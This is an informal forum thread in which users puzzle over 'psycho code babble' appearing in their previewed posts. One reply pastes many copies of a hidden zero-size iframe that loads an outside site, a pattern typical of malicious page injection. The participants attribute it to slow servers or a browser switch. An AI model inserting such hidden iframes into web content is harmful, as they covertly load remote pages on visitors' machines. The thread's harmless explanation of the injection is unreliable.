A&F Psycho Babble

I've been having very strange problems with trying to type my posts. For instance, the word book brings up a link and when you preview it before you post it, a whole bunch of code contaminates what you are trying to say. And I don't remember, but I think another word or something brought up this same complex hiccup. And just now, as I was trying to reply to this magazine thread, I could not post without having horrible psycho code babble everywhere all over my typing, whenever I previewed it. You could barely read what I was trying to say, the psycho babble is everywhere. So I just posted it without previewing and that seemed to get along fine.
What is going on with A&F? Where's this malfunctioning technical stuff coming from? And does anybody else notice?

That's interesting.
A lot of code gets posted on my post each time after I use "the" and preview it. Here's an example:
the<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> site has some of the<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME><IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> technical problems and the<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME><IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> code is really annoying. the<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME><IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> end.

It can happen when the server is a bit slow. The best thing you can do to avoid having to type you message again, is copy-paste it in a word doc before you press the "post" button. I think we all suffer from this problem one in awhile.
Blue Star, that is a really weird thing going on. Did you change anything in your profile or in your settings?
I tried to reproduce your problem but nothing weird happens over here.

The only thing I did recently was change my signature. I haven't done anything to make the typing system all weird, that's for sure. *shrugs* I don't know what's going on.
Oh great- now the forum index is super wide across the screen. It may be me or the board, I'm not sure.

Blue - I'm not sure what the problem could be that causes all that code to appear. Have you changed/upgraded your browser lately? Sometimes A&F doesn't work perfect in some browsers, and that could be a problem. If it is a board problem, I'll report it to Jochen and he'll probably know what's wrong.

*gasp* Ooooooohhh, now I think I know what's wrong Harmonica. Recently I changed from going to Internet Explorer to going to MSN, and I transfered all my favorites and everything. But I'm not sure how that links directly to the problem. I'm sure that may be the reason though.
But now I have nothing to complain about, because everything's back to normal again. Yay!

That is probably what's wrong. Try using IE again and see if you get the same problem, if not it probably means that A&F isn't fully compatible with MSN.

It doesn't happen anymore on MSN. Maybe it was just that one day.
